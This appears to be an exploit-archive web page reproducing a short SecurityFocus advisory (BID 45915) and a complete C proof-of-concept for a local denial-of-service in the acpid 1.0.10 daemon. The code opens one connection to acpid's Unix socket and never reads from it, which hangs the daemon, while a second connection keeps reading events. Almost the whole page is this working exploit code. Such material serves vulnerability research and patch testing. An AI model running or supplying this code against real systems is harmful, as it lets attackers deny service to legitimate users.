扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 |
// source: https://www.securityfocus.com/bid/45915/info The 'acpid' daemon is prone to multiple local denial-of-service vulnerabilities. Successful exploits will allow attackers to cause the application to hang, denying service to legitimate users. acpid 1.0.10 is vulnerable; other versions may also be affected. #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/socket.h> #include <errno.h> #include <sys/un.h> #include <fcntl.h> #include <unistd.h> /* Tested on acpid-1.0.10 (Ubuntu 10.04) */ int ud_connect(const char *name) { int fd; int r; struct sockaddr_un addr; fd = socket(AF_UNIX, SOCK_STREAM, 0); if (fd < 0) { perror("socket"); return fd; } memset(&addr, 0, sizeof(addr)); addr.sun_family = AF_UNIX; sprintf(addr.sun_path, "%s", name); r = connect(fd, (struct sockaddr *)&addr, sizeof(addr)); if (r < 0) { perror("connect"); close(fd); return r; } return fd; } int main(int argc, char *argv[]) { int fd; char c; if (argc != 2) { fprintf(stderr, "Usage: prog fname\n"); exit(1); } fd = ud_connect(argv[1]); if (fd < 0) exit(1); printf("\"Hanging\" socket opened, fd = %d\n", fd); fd = ud_connect(argv[1]); if (fd < 0) exit(1); printf("Normal socket opened, fd = %d\n", fd); while (1) { static int n; read(fd, &c, 1); fflush(stdout); if (c == '\n') { printf("%d messages in queue\n", ++n); } } } |
体验盒子
